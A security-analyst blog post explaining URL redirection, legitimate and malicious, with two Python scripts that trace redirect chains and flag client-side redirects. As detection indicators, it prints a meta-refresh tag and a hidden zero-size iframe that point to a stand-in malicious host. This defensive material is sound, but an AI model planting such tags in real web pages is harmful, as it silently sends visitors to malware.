URL redirection, also called URL forwarding, is not all malicious and has valid and acceptable uses. The technique allows a server to redirect a client request to a different page, site or domain for legitimate reasons. In a redirect, a web browser attempts to open a URL and that request is forwarded on to another location. Some of the legitimate reasons for URL redirection include:
A very common example of this is redirecting users to a mobile version of a website. If a user browses a site with a mobile client they could automatically be forwarded to a corresponding mobile version of a website.
Typically seen on sites targeting larger audiences in more than one location, this redirects users to more relevant localized content.
Removing referer details
When a link is clicked the browser sends the referer field, which could contain sensitive URLs that end up in the server logs of an external site. For example, http://packetreport.com/future-plans would not be a desirable referer field leaving an organization; a redirection page would remove the exposure.
Similar domain names
Users might type a misspelled domain such as packtereport.com and get redirected to our actual site, packetreport.com. This safeguards both the audience and the organization.
Redirection Used in Exploits
As security analysts we see this every day of the week: a user suddenly sets off an IDS alert for touching a known malware site or bad domain. I am always curious to see why this happened, and in most cases the user did one of three things: clicked a link in a phish, opened a document from a phish, or browsed a compromised site that has a malicious redirect configured. The following examples are not a complete list of techniques, but they are the most common malicious redirects.
The HTTP 3xx Redirection status codes indicate that the client must take additional action to complete the request. Many of these status codes are used in URL redirection; the three most common are 301 Moved Permanently, 302 Found and 307 Temporary Redirect.
301 Moved Permanently: This is known as a permanent redirect and is used to indicate that the originating URL has permanently moved to a new location.
302 Found: Indicates the target resource resides temporarily under a different URI.
307 Temporary Redirect: The target resource resides temporarily under a different URI, and the user agent must not change the request method if it performs an automatic redirection to that URI.
This is a client-side redirection and tells the browser to request another page.
To create an HTML redirect page, you use the HTML meta tag along with the 'http-equiv' and 'content' attributes. Meta Refresh is a special meta tag contained within the head section of the HTML source. It refreshes the page to the new site listed after the url field. The number at the start of the content attribute is the delay in seconds before loading; if set to 0 it redirects immediately as the page is loading.
What to look for:
- <meta http-equiv="Refresh" content="0; url=http://www.evil.site/" />
This is a method where the content of another page is shown within an iframe or frameset, so that it looks like the content is part of the original URL. Especially dangerous are hidden iframes with width and/or height values of 0 or a few pixels, which are hardly visible to the user.
What to look for:
- <iframe src="hxxp://evil.site/count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
The methods explained above are not new, revolutionary, hard to detect or very sneaky, but they do work and malware authors will continue to use them in the future. Redirecting users to malicious content using HTTP redirects or embedded iframes is not going to trend downwards or cease to be an easy way to deliver malicious content anytime soon. Detecting the redirect using IDS signatures or blacklists and blocking the subsequent chain is always key.
Simple script that follows HTTP redirections and displays the resulting HTTP status codes for each hop:
—————– http-redirect.py ——————-
import requests

r = requests.get('http://evil.site')  # requests follows the 3xx chain automatically
for h in r.history:  # intermediate redirect responses, in order
    print('[%s] %s' % (h.status_code, h.url))
print('[%s] %s' % (r.status_code, r.url))  # final response after the chain
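The script above only sees server-side 3xx hops. As an added example (not part of the original post), the following scanner checks a fetched HTML body for the client-side indicators listed under "What to look for": a meta refresh and an iframe with zero-size dimensions or a hidden style. The sample body is constructed from those indicators; the class and function names are my own.

```python
from html.parser import HTMLParser

# Constructed sample body, modelled on the "What to look for" indicators above
SAMPLE_HTML = """<html><head>
<meta http-equiv="Refresh" content="0; url=http://www.evil.site/" />
</head><body>
<iframe src="hxxp://evil.site/count.php?o=1" width=0 height=0 style="hidden"
        frameborder=0 scrolling=no></iframe>
<iframe src="https://www.example.com/embed/x" width="560" height="315"></iframe>
</body></html>"""


def _px(value):
    """Parse a width/height attribute; non-numeric values count as visible."""
    try:
        return float(str(value).rstrip('px%').strip())
    except ValueError:
        return float('inf')


class RedirectScanner(HTMLParser):
    """Collects meta-refresh redirects and hidden or tiny iframes from an HTML body."""

    def __init__(self):
        super().__init__()
        self.findings = []  # (kind, target, detail) tuples

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or '') for k, v in attrs}
        if tag == 'meta' and a.get('http-equiv', '').lower() == 'refresh':
            delay, _, rest = a.get('content', '').partition(';')
            url = rest.strip()
            if url.lower().startswith('url='):
                url = url[4:].strip().strip('\'"')
            self.findings.append(('meta-refresh', url, 'delay=%s' % delay.strip()))
        elif tag == 'iframe':
            # 0 or 1 pixel wide/high, or a hidden style, is the pattern from the post
            tiny = any(_px(a[d]) <= 1 for d in ('width', 'height') if d in a)
            style = a.get('style', '').replace(' ', '').lower()
            hidden = 'hidden' in style or 'display:none' in style
            if tiny or hidden:
                detail = 'w=%s h=%s' % (a.get('width'), a.get('height'))
                self.findings.append(('hidden-iframe', a.get('src', ''), detail))


def scan_html(body):
    """Return the list of suspicious redirect findings in an HTML document."""
    parser = RedirectScanner()
    parser.feed(body)
    return parser.findings


if __name__ == '__main__':
    for kind, target, detail in scan_html(SAMPLE_HTML):
        print('[%s] %s (%s)' % (kind, target, detail))
```

Feed it the body of the final response from the redirect script (r.text) to cover both kinds of redirect in one pass.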